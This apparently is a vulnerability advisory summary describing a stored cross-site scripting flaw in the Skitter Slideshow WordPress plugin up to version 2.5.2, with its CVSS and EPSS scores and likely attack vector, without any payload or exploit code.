The Skitter Slideshow plugin for WordPress contains an input sanitization flaw that permits an attacker to inject malicious JavaScript that is then stored and served to site visitors. This Stored XSS can lead to session hijacking, credential theft, defacement, or execution of further malicious code under the victim’s browser context. The vulnerability is categorized as CWE‑79 and directly affects the confidentiality, integrity, and availability of the site for all users who view pages rendered by the plugin.

Thiago S.F.'s Skitter Slideshow plugin is vulnerable in all releases from the earliest available version through version 2.5.2 inclusive. WordPress sites that have this plugin installed and have not upgraded beyond 2.5.2 are at risk. The specific affected product name is ‘Skitter Slideshow’ and it is integrated as a WordPress plugin.

The CVSS score of 5.9 indicates a medium impact, while the EPSS value of less than 1 % suggests a very low probability of current exploitation in the wild. The vulnerability is not listed in the CISA KEV catalog. Based on the description, the likely attack vector is through an administrative or content‑creation interface that allows arbitrary text to be entered into the plugin’s settings or slideshow content, where the attacker can inject malicious payloads. Once injected, the script executes when any user views the affected page, providing the attacker with the same privileges as the visitor who triggered the page load.